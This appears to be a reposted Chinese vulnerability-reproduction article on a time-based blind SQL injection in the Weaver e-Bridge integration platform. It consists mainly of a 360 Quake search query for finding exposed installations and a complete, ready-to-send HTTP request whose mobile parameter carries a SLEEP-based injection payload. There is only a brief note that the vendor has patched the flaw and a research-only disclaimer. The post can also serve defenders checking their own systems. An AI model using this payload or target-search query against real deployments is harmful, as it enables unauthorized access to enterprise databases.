泛微云桥(e-Bridge)是一款用于桥接各种以IM为核心的移动APP与企业信息化系统移动H5应用的系统集成平台,主要实现用户认证,单点登录以及消息推送,目前云桥已经支持与企业微信、微信公众号、钉钉(包括阿里钉钉和政务钉钉)、云之家、飞书、welink以及微信小程序集成,如需要与上述以外的app集成,可通过其他APP方式来集成。后续e-bridge将整合更多的互联网信息化资源,让企业能够更加便利的利用开放的互联网资源进行企业信息化建设。
漏洞编号:无
漏洞类型:SQL注入(延迟注入)
360QUAKE=app:"泛微-云桥e-Bridge"
访问
http
://目标IP+端口/taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1出现如下界面可能存在漏洞。
使用Burp进行抓包,使用测试是否存在漏洞点,如存在漏洞页面延迟
10s
,POC如下:
GET /taste/addTaste?company=
1
&userName=
1
&openid=
1
&source=
1
&mobile=
1
%
27
%
20
AND%
20
(SELECT%
208094
%
20
FROM%
20
(SELECT(SLEEP(
10
-(IF(
18015
%
3e3469
,
0
,
4
)))))mKjk)%
20
OR%
20
%
27
KQZm%
27
=%
27
REcX HTTP/
1.1
Host: 目标IP
User-Agent: Mozilla/
5.0
(Windows NT
10.0
; Win64; x64; rv:
120.0
) Gecko/
20100101
Firefox/
120.0
Accept: text/html,application/xhtml+xml,application/xml;q=
0.9
,image/avif,image/webp,*
/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
官方已修复此漏洞,建议受影响用户尽快在官网查询更新
原文始发于微信公众号(Guoxin 401):漏洞复现|泛微-云桥e-Bridge SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论